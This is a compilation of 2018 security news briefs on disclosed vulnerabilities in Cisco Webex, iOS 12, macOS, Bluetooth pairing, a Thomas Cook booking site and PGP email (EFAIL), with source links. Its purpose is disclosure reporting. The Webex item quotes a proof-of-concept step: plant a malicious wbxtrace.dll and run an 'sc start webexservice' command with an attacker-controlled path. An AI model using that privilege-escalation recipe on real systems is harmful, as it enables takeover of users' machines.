Vulnerability Found in Cisco Webex Meetings

By: Kacy Zurkus

A security researcher has discovered a vulnerability in an elevation of privilege in the update service of the Cisco Webex Meeting application. The update service fails to properly validate user-supplied parameters, according to SecureAuth.

The vulnerability was discovered by Marcos Accossatto from SecureAuth exploits’ writers team, and the release of today’s vulnerability advisory was a coordinated effort between SecureAuth and Cisco. Reportedly used by millions of people each month, the video conferencing product’s flaw (CVE-2018-15442) impacts code execution in Cisco Webex Meetings v33.6.2.16 and likely affects older versions as well, though they were not checked.

With a common weakness enumeration (CWE-78) classified as OS command injection, the vulnerability could allow an unprivileged local attacker to run arbitrary commands with system user privileges by invoking the update service command with a crafted argument, according to the advisory.

In the privilege escalation proof of concept (PoC), the researcher wrote: “The vulnerability can be exploited by copying to an a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).”

While the video conferencing provider had fixed this vulnerability last month, Accossatto was reportedly able to bypass that fix using DLL hijacking. Cisco’s Webex Meetings has now released a new patch and updated its previous security notice.

More: https://www.infosecurity-magazine.com/news/vulnerability

Expert demonstrated how to access contacts and photos from a locked iPhone XS

By: Pierluigi Paganini

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos, contacts on a locked iPhone XS .

The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker (with physical access to the iPhone) to access photos, contacts on a locked iPhone XS and other devices.

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue allowing images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack exploits the VoiceOver feature that enables accessibility features on iPhone, for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step by step guide for the Rodriguez’s attack was published by the website Gadget Hacks.

More:  https://securityaffairs.co/wordpress/76700/hacking/iphone-xs-passcode-hack.html

 

Critical MacOS Mojave vulnerability bypasses system security

By: Michael Archambault

With the launch of a new version of macOS from Apple typically comes a culmination of new features, better performance, and enhanced security. Unfortunately, the previous statement might not necessarily be true as security researcher Patrick Wardle, co-founder of Digita Security, has discovered that MacOS Mojave includes a severe security flaw; the bug is currently present on all machines running the latest version of macOS and allows unauthorized access to a users’ private data.

Wardle announced his discovery on Twitter, showcasing that he could easily bypass macOS Mojave’s built-in privacy protections. Due to the flaw, an unauthorized application could circumvent the system’s security and gain access to potentially sensitive information. With the Twitter post, Wardle also included a one-minute Vimeo video showing the hack in progress.

The short video begins with Wardle attempting to access a user’s protected address book and receiving a message that states the operation is not permitted. After accessing and running his bypass program, breakMojave, Wardle is then able to locate the user’s address book, circumvent the machine’s privacy access controls, and copy the address book’s contents to his desktop — no permissions needed.

Wardle is an experienced security researcher who has worked at NASA and the National Security Agency in his past; he notes that one of his current passions is finding MacOS security flaws before others have the chance. While it is unlikely Wardle will release the app as a malicious tool, he does want to spread knowledge of its existence so that Apple addresses the issue in a timely fashion.

More: https://www.digitaltrends.com/computing/macos-mojave-vulnerability

 

ex-NSA Hacker Discloses macOS High Sierra Zero-Day Vulnerability

By: Mohit Kumar

Your Mac computer running the Apple’s latest High Sierra operating system can be hacked by tweaking just two lines of code, a researcher demonstrated at the Def Con security conference on Sunday.

Patrick Wardle, an ex-NSA hacker and now Chief Research Officer of Digita Security, uncovered a critical zero-day vulnerability in the macOS operating system that could allow a malicious application installed in the targeted system to virtually “click” objects without any user interaction or consent.

To know, how dangerous it can go, Wardle explains: “Via a single click, countless security mechanisms may be completely bypassed. Run untrusted app? Click…allowed. Authorize keychain access? Click…allowed. Load 3rd-party kernel extension? Click…allowed. Authorize outgoing network connection? click …allowed.”

Wardle described his research into “synthetic” interactions with a user interface (UI) as “The Mouse is Mightier than the Sword,” showcasing an attack that’s capable of ‘synthetic clicks’—programmatic and invisible mouse clicks that are generated by a software program rather than a human.

macOS code itself offers synthetic clicks as an accessibility feature for disabled people to interact with the system interface in non-traditional ways, but Apple has put some limitations to block malware from abusing these programmed clicks.

More: https://thehackernews.com/2018/08/macos-mouse-click-hack.html

Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation

By: Eduard Kovacs

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

More: https://www.securityweek.com/bluetooth-vulnerability-allows-traffic-monitoring-manipulation

Russia’s national vulnerability database is incomplete, and a cover for software snooping

By: Bradley Barth

The government organization running Russia’s national vulnerability database (NVD) is far less comprehensive than its American counterpart, omitting many critical bugs while focusing heavily on flaws that appear to be specifically relevant to Russian state information systems, according to new research from Recorded Future.

The Russian database, known as the BDU, is administered by the Federal Service for Technical and Export Control of Russia (FSTEC), a national military counterintelligence agency. According to Recorded Future, since 2014 FSTEC has published only about 10 percent of the 107,901 total bugs announced by the American NVD, which is operated by the U.S. Commerce Department’s National Institute of Standards and Technology (NIST).

In a blog post issued today, Recorded Future concludes that the Russian database exists not so much to provide a public service, but rather to establish a minimum set of security guidelines for Russian officials tasked with securing government information systems.

At the same time, having an official vulnerability database also gives Russia a seemingly legitimate cover for demanding that foreign software and security companies submit their products to FSTEC and related agencies for inspection of their source code, Recorded Future continues. But in reality, this is just a thin veneer through which Russia disguises its efforts to gather intel on foreign software, the researchers assert.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” writes report authors and researchers Priscilla Moriuchi, director of strategic threat development, and Dr. Bill Ladd, chief data scientist.

In an interview with SC Media, Moriuchi added that the BDU database is “virtually useless,” with “almost nothing in this that you can’t find in another database that is… more comprehensive.” And yet, it is “just enough legitimate content” to provide plausible deniability regarding “the real mission of the organizations.”

Recorded Future notes that a disproportionate number of BDU’s published bugs are flaws known to be commonly exploited by Russian APT groups. Indeed, the report says that FSTEC has listed about 60 percent of all vulnerabilities used by the Russian military. The researchers believe that this could mean Russian military officials are taking measures to ensure that the same exploits aren’t similarly employed against their own government’s information systems.

More: https://www.scmagazine.com/report-russias-national-vulnerability-database-is-incomplete-and-a-cover-for-software-snooping/article/781039/

Travel Information Leaked at Thomas Cook Airlines

By: Kacy Zurkus

A bug finder recently discovered that Thomas Cook Airlines had a security vulnerability for years, making it possible for hackers to systematically download hundreds of thousands of passenger flight details and personal data going back as far as 2013.

The issue, rated a medium to high severity level, leaked personal and travel information but is reportedly now fixed, according to a 9 July blog post by Roy Solberg. After booking his vacation, Solberg reportedly received an email from Thomas Cook Airlines with a suspicious link to airshoppen.com.

“I never downloaded a lot of data as I don’t want anyone to question my motives, but I do like to get an idea of the scope of the data leak, so I did a few tests to see if I could see how many bookings this was affecting,” Solberg wrote. In his tests, Solberg found Ving bookings from as far back as 2013, with the most recent one from 2019.

Using only a booking number, it was possible to retrieve all names on the travel booking along with the email address of the person registering the booking. Also included in the data was departure and arrival dates with airport and flight number information. After nearly two weeks of attempting to disclose the vulnerability, Solberg reportedly received little more than frustrating exchanges before never hearing from Thomas Cook Airlines again.

Three days after he went to the press, the vulnerability was reportedly fixed. This vulnerability, known as an Insecure Direct Object Reference (IDOR) is not only a commonly encountered problem on poorly designed web applications, but it’s also easy for an attacker to exploit. The issue raises concerns for both privacy and phishing attacks.

“We take any breach of our customer data extremely seriously. After being alerted to this unauthorized access to our online duty free shopping website in Norway, we closed the loophole and took responsible actions in line with the law,” a Thomas Cook spokesperson wrote in an email.

“Based upon the evidence we have, and the limited volume and nature of the data that was accessed, our assessment is that this was not an incident which is required to be reported to the authorities. For the same reasons we have not contacted the customers affected.

More: https://www.infosecurity-magazine.com/news/travel-information-leaked-at/

Mobile App Threats Continue to Grow

By: Curtis Franklin Jr

Criminals looking to profit from corporate resources and information keep going after mobile devices, two new reports confirm.

 Security threats aimed at mobile devices are evolving and shifting – and show no sign of going away. Those are the key results found in a pair of just-released reports on mobile security.

More specifically, the reports look at the security of third-party mobile applications and the effectiveness of carrier-based protection. The picture that emerges is one of risk that varies across industries but is never truly low, as well as the importance of trying to stop the actions of malicious apps as high in the network chain as possible.

In its study of third-party app risk, BitSight researchers found that vulnerable apps are common across all industries, with the vulnerabilities including data leakage, privilege abuse, unencrypted personally identifiable information, and credential theft. The differences are in the proportion of vulnerabilities that make up the total picture of each industry.

For example, BitSight’s research shows that finance had the highest rate (34%) of broken SSL configurations, while 32% of business services and education apps failed at encrypting user data. But in no industry is there a single, simple vulnerability. As Immunity researcher Lurene Grenier said at the recent Talos Threat Summit, “There are probably 10 full iPhone [exploit] chains at any given time. And that’s the most secure calling platform.”

In a speech at Interop ITX in May, Mike Murray, vice president of security intelligence at Lookout, pointed out why criminals are so interested in mobile malware. “The phone is no longer a phone. It’s an electronic device that has access to every part of our digital lives,” he said. “Unfortunately, we still think of it and protect it like it’s a Motorola flip-phone.”

A second report, Telco Security Trends, Q2 2018, conducted by Allot, looks at malware traffic from four communications service providers (CSPs) across Europe and Israel. It found that the CSPs were stopping an average of two pieces of malware per device per day.

More: https://www.darkreading.com/vulnerabilities—threats/mobile-app-threats-continue-to-grow/d/d-id/1332052

Email No Longer a Secure Method of Communication After Critical Flaw Discovered in PGP

By: Matt Novak

If you use PGP or S/MIME for email encryption you should immediately disable it in your email client. Researchers have discovered a critical vulnerability they’re calling EFAIL that exposes the encrypted emails in plaintext, even for messages sent in the past.

“Email is no longer a secure communication medium,” Sebastian Schinzel, a professor of computer security at Germany’s Münster University of Applied Sciences, told the German news outlet Süddeutsche Zeitung.

The vulnerability was first reported by the Electronic Frontier Foundation (EFF) in the early hours of Monday morning, and details were released prematurely just before 6am ET today after Süddeutsche Zeitungbroke a news embargo. The group of European researchers are warning people to stop using PGP entirely and say that, “there are currently no reliable fixes for the vulnerability.”

From the researchers:

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

More: https://gizmodo-com.cdn.ampproject.org/c/s/gizmodo.com/email-no-longer-a-secure-method-of-communication-after-1826002682/amp